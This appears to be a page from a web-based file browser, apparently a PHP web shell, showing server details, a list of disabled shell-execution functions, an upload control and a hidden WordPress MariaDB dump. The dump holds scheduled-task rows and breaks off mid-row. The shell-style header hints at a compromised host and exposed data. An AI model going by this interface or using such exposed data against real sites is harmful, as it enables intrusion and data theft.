HEX
Server: nginx/1.27.1
System: Linux in-4 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64
User: ilikadirect (1186)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v6964/gopalak/.db.sql
/*M!999999\- enable the sandbox mode */ 
-- MariaDB dump 10.19  Distrib 10.6.22-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: gopalakdb
-- ------------------------------------------------------
-- Server version	10.6.22-MariaDB-ubu2204

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wp_actionscheduler_actions`
--

DROP TABLE IF EXISTS `wp_actionscheduler_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_actionscheduler_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `hook` varchar(191) NOT NULL,
  `status` varchar(20) NOT NULL,
  `scheduled_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `scheduled_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  `args` varchar(191) DEFAULT NULL,
  `schedule` longtext DEFAULT NULL,
  `group_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `attempts` int(11) NOT NULL DEFAULT 0,
  `last_attempt_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `last_attempt_local` datetime DEFAULT '0000-00-00 00:00:00',
  `claim_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `extended_args` varchar(8000) DEFAULT NULL,
  `priority` tinyint(3) unsigned NOT NULL DEFAULT 10,
  PRIMARY KEY (`action_id`),
  KEY `hook` (`hook`),
  KEY `status` (`status`),
  KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
  KEY `args` (`args`),
  KEY `group_id` (`group_id`),
  KEY `last_attempt_gmt` (`last_attempt_gmt`),
  KEY `claim_id_status_scheduled_date_gmt` (`claim_id`,`status`,`scheduled_date_gmt`)
) ENGINE=InnoDB AUTO_INCREMENT=156169 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_actionscheduler_actions`
--

LOCK TABLES `wp_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `wp_actionscheduler_actions` DISABLE KEYS */;
INSERT INTO `wp_actionscheduler_actions` VALUES (1755,'aioseo_cache_prune','failed','2022-10-11 21:56:57','2022-10-12 03:26:57','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1665525417;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1665525417;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-11 22:00:29','2022-10-12 03:30:29',0,NULL,10),(1762,'wpforms_admin_addons_cache_update','failed','2022-10-17 21:57:22','2022-10-18 03:27:22','{\"tasks_meta_id\":2}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666043842;s:18:\"\0*\0first_timestamp\";i:1666043842;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666043842;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-10-17 21:57:23','2022-10-18 03:27:23',0,NULL,10),(1763,'wpforms_admin_builder_templates_cache_update','failed','2022-10-17 21:57:22','2022-10-18 03:27:22','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666043842;s:18:\"\0*\0first_timestamp\";i:1666043842;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666043842;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-10-17 21:57:23','2022-10-18 03:27:23',0,NULL,10),(1805,'aioseo_cache_prune','failed','2022-10-12 22:00:29','2022-10-13 03:30:29','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1665612029;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1665612029;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-12 22:01:44','2022-10-13 03:31:44',0,NULL,10),(1809,'woocommerce_run_on_woocommerce_admin_updated','failed','2022-10-12 03:55:20','2022-10-12 09:25:20','[\"Automattic\\\\WooCommerce\\\\Admin\\\\RemoteInboxNotifications\\\\RemoteInboxNotificationsEngine\",\"run_on_woocommerce_admin_updated\"]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1665546920;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1665546920;}',8,1,'2022-10-12 03:55:21','2022-10-12 09:25:21',0,NULL,10),(1812,'aioseo_cache_prune','failed','2022-10-13 22:01:44','2022-10-14 03:31:44','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1665698504;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1665698504;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-14 04:44:38','2022-10-14 10:14:38',0,NULL,10),(1818,'aioseo_cache_prune','failed','2022-10-15 04:44:38','2022-10-15 10:14:38','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1665809078;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1665809078;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-15 21:53:29','2022-10-16 03:23:29',0,NULL,10),(1830,'action_scheduler/migration_hook','failed','2022-10-14 10:03:00','2022-10-14 15:33:00','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1665741780;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1665741780;}',1,1,'2022-10-14 10:03:14','2022-10-14 15:33:14',0,NULL,10),(1834,'action_scheduler/migration_hook','failed','2022-10-14 10:46:00','2022-10-14 16:16:00','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1665744360;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1665744360;}',1,1,'2022-10-14 10:46:59','2022-10-14 16:16:59',0,NULL,10),(1835,'aioseo_cache_prune','failed','2022-10-16 21:53:29','2022-10-17 03:23:29','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1665957209;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1665957209;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-17 04:00:50','2022-10-17 09:30:50',0,NULL,10),(1839,'aioseo_cache_prune','failed','2022-10-18 04:00:50','2022-10-18 09:30:50','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666065650;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666065650;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-18 04:30:22','2022-10-18 10:00:22',0,NULL,10),(1846,'wpforms_admin_addons_cache_update','failed','2022-10-24 21:57:23','2022-10-25 03:27:23','{\"tasks_meta_id\":2}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666648643;s:18:\"\0*\0first_timestamp\";i:1666043842;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666648643;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-10-25 04:49:57','2022-10-25 10:19:57',0,NULL,10),(1847,'wpforms_admin_builder_templates_cache_update','failed','2022-10-24 21:57:23','2022-10-25 03:27:23','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666648643;s:18:\"\0*\0first_timestamp\";i:1666043842;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666648643;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-10-25 04:49:57','2022-10-25 10:19:57',0,NULL,10),(1849,'aioseo_cache_prune','failed','2022-10-19 04:30:22','2022-10-19 10:00:22','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666153822;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666153822;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-19 04:30:56','2022-10-19 10:00:56',0,NULL,10),(1855,'aioseo_cache_prune','failed','2022-10-20 04:30:56','2022-10-20 10:00:56','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666240256;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666240256;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-20 04:31:25','2022-10-20 10:01:25',0,NULL,10),(1863,'aioseo_cache_prune','failed','2022-10-21 04:31:25','2022-10-21 10:01:25','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666326685;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666326685;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-21 10:43:39','2022-10-21 16:13:39',0,NULL,10),(1869,'aioseo_cache_prune','failed','2022-10-22 10:43:39','2022-10-22 16:13:39','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666435419;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666435419;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-22 21:54:42','2022-10-23 03:24:42',0,NULL,10),(1873,'aioseo_cache_prune','failed','2022-10-23 21:54:42','2022-10-24 03:24:42','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666562082;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666562082;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-23 23:34:34','2022-10-24 05:04:34',0,NULL,10),(1877,'aioseo_cache_prune','failed','2022-10-24 23:34:34','2022-10-25 05:04:34','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666654474;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666654474;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-25 04:49:57','2022-10-25 10:19:57',0,NULL,10),(1882,'wpforms_admin_addons_cache_update','failed','2022-11-01 04:49:57','2022-11-01 10:19:57','{\"tasks_meta_id\":2}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667278197;s:18:\"\0*\0first_timestamp\";i:1666043842;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667278197;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-11-01 11:52:07','2022-11-01 17:22:07',0,NULL,10),(1883,'wpforms_admin_builder_templates_cache_update','failed','2022-11-01 04:49:57','2022-11-01 10:19:57','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667278197;s:18:\"\0*\0first_timestamp\";i:1666043842;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667278197;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-11-01 11:52:07','2022-11-01 17:22:07',0,NULL,10),(1884,'aioseo_cache_prune','failed','2022-10-26 04:49:57','2022-10-26 10:19:57','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666759797;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666759797;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-26 11:59:47','2022-10-26 17:29:47',0,NULL,10),(1889,'aioseo_cache_prune','failed','2022-10-27 11:59:47','2022-10-27 17:29:47','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666871987;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666871987;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-27 12:00:18','2022-10-27 17:30:18',0,NULL,10),(1896,'aioseo_cache_prune','failed','2022-10-28 12:00:18','2022-10-28 17:30:18','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1666958418;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1666958418;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-28 12:00:19','2022-10-28 17:30:19',0,NULL,10),(1912,'aioseo_cache_prune','failed','2022-10-29 12:00:19','2022-10-29 17:30:19','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667044819;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667044819;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-29 21:55:48','2022-10-30 03:25:48',0,NULL,10),(1916,'aioseo_cache_prune','failed','2022-10-30 21:55:48','2022-10-31 03:25:48','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667166948;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667166948;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-30 21:55:51','2022-10-31 03:25:51',0,NULL,10),(1920,'aioseo_cache_prune','failed','2022-10-31 21:55:51','2022-11-01 03:25:51','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667253351;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667253351;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-10-31 21:59:34','2022-11-01 03:29:34',0,NULL,10),(1924,'aioseo_cache_prune','failed','2022-11-01 21:59:34','2022-11-02 03:29:34','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667339974;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667339974;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-11-01 22:07:26','2022-11-02 03:37:26',0,NULL,10),(1929,'wpforms_admin_addons_cache_update','failed','2022-11-08 11:52:07','2022-11-08 17:22:07','{\"tasks_meta_id\":2}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667908327;s:18:\"\0*\0first_timestamp\";i:1666043842;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667908327;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-11-08 15:28:13','2022-11-08 20:58:13',0,NULL,10),(1930,'wpforms_admin_builder_templates_cache_update','failed','2022-11-08 11:52:07','2022-11-08 17:22:07','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667908327;s:18:\"\0*\0first_timestamp\";i:1666043842;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667908327;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-11-08 15:28:13','2022-11-08 20:58:13',0,NULL,10),(1932,'aioseo_cache_prune','failed','2022-11-02 22:07:26','2022-11-03 03:37:26','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667426846;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667426846;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-11-02 22:12:54','2022-11-03 03:42:54',0,NULL,10),(1937,'woocommerce_run_on_woocommerce_admin_updated','failed','2022-11-01 22:07:43','2022-11-02 03:37:43','[\"Automattic\\\\WooCommerce\\\\Admin\\\\RemoteInboxNotifications\\\\RemoteInboxNotificationsEngine\",\"run_on_woocommerce_admin_updated\"]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1667340463;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1667340463;}',8,1,'2022-11-01 22:36:59','2022-11-02 04:06:59',0,NULL,10),(1941,'aioseo_cache_prune','failed','2022-11-03 22:12:54','2022-11-04 03:42:54','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667513574;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667513574;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-11-04 08:09:23','2022-11-04 13:39:23',0,NULL,10),(1947,'aioseo_cache_prune','failed','2022-11-05 08:09:23','2022-11-05 13:39:23','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667635763;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667635763;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-11-05 15:08:40','2022-11-05 20:38:40',0,NULL,10),(1951,'aioseo_cache_prune','failed','2022-11-06 15:08:40','2022-11-06 20:38:40','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667747320;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667747320;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-11-07 05:01:01','2022-11-07 10:31:01',0,NULL,10),(1955,'aioseo_cache_prune','failed','2022-11-08 05:01:01','2022-11-08 10:31:01','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667883661;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667883661;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-11-08 07:59:48','2022-11-08 13:29:48',0,NULL,10),(1959,'aioseo_cache_prune','failed','2022-11-09 07:59:48','2022-11-09 13:29:48','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1667980788;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1667980788;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-11-09 10:53:20','2022-11-09 16:23:20',0,NULL,10),(1964,'wpforms_admin_addons_cache_update','failed','2022-11-15 15:28:13','2022-11-15 20:58:13','{\"tasks_meta_id\":2}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1668526093;s:18:\"\0*\0first_timestamp\";i:1666043842;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1668526093;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-11-15 23:06:19','2022-11-16 04:36:19',0,NULL,10),(1965,'wpforms_admin_builder_templates_cache_update','failed','2022-11-15 15:28:13','2022-11-15 20:58:13','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1668526093;s:18:\"\0*\0first_timestamp\";i:1666043842;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1668526093;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-11-15 23:06:19','2022-11-16 04:36:19',0,NULL,10),(1968,'woocommerce_run_on_woocommerce_admin_updated','failed','2022-11-08 23:48:04','2022-11-09 05:18:04','[\"Automattic\\\\WooCommerce\\\\Admin\\\\RemoteInboxNotifications\\\\RemoteInboxNotificationsEngine\",\"run_on_woocommerce_admin_updated\"]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1667951284;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1667951284;}',8,1,'2022-11-08 23:48:06','2022-11-09 05:18:06',0,NULL,10),(1969,'aioseo_cache_prune','failed','2022-11-10 10:53:20','2022-11-10 16:23:20','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1668077600;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1668077600;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-11-10 11:04:36','2022-11-10 16:34:36',0,NULL,10),(1974,'aioseo_cache_prune','failed','2022-11-11 11:04:36','2022-11-11 16:34:36','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1668164676;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1668164676;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-11-11 15:41:24','2022-11-11 21:11:24',0,NULL,10),(1978,'aioseo_cache_prune','failed','2022-11-12 15:41:24','2022-11-12 21:11:24','[]','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1668267684;s:18:\"\0*\0first_timestamp\";i:1643088605;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1668267684;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',4,1,'2022-11-12 16:44:36','2022-11-12 22:14:36',0,NULL,10),(1996,'wpforms_admin_addons_cache_update','failed','2022-11-23 02:27:51','2022-11-23 07:57:51','{\"tasks_meta_id\":17}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1669170471;s:18:\"\0*\0first_timestamp\";i:1669170471;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1669170471;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-11-23 08:05:57','2022-11-23 13:35:57',0,NULL,10),(1997,'wpforms_admin_builder_templates_cache_update','failed','2022-11-23 02:27:51','2022-11-23 07:57:51','{\"tasks_meta_id\":18}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1669170471;s:18:\"\0*\0first_timestamp\";i:1669170471;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1669170471;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-11-23 08:05:57','2022-11-23 13:35:57',0,NULL,10),(2023,'wpforms_admin_addons_cache_update','failed','2022-11-30 14:59:17','2022-11-30 20:29:17','{\"tasks_meta_id\":19}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1669820357;s:18:\"\0*\0first_timestamp\";i:1669820357;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1669820357;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-11-30 19:53:14','2022-12-01 01:23:14',0,NULL,10),(2024,'wpforms_admin_builder_templates_cache_update','failed','2022-11-30 14:59:17','2022-11-30 20:29:17','{\"tasks_meta_id\":20}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1669820357;s:18:\"\0*\0first_timestamp\";i:1669820357;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1669820357;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-11-30 19:53:14','2022-12-01 01:23:14',0,NULL,10),(2050,'wpforms_admin_addons_cache_update','failed','2022-12-08 06:58:06','2022-12-08 12:28:06','{\"tasks_meta_id\":21}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1670482686;s:18:\"\0*\0first_timestamp\";i:1670482686;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1670482686;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',9,1,'2022-12-08 07:29:55','2022-12-08 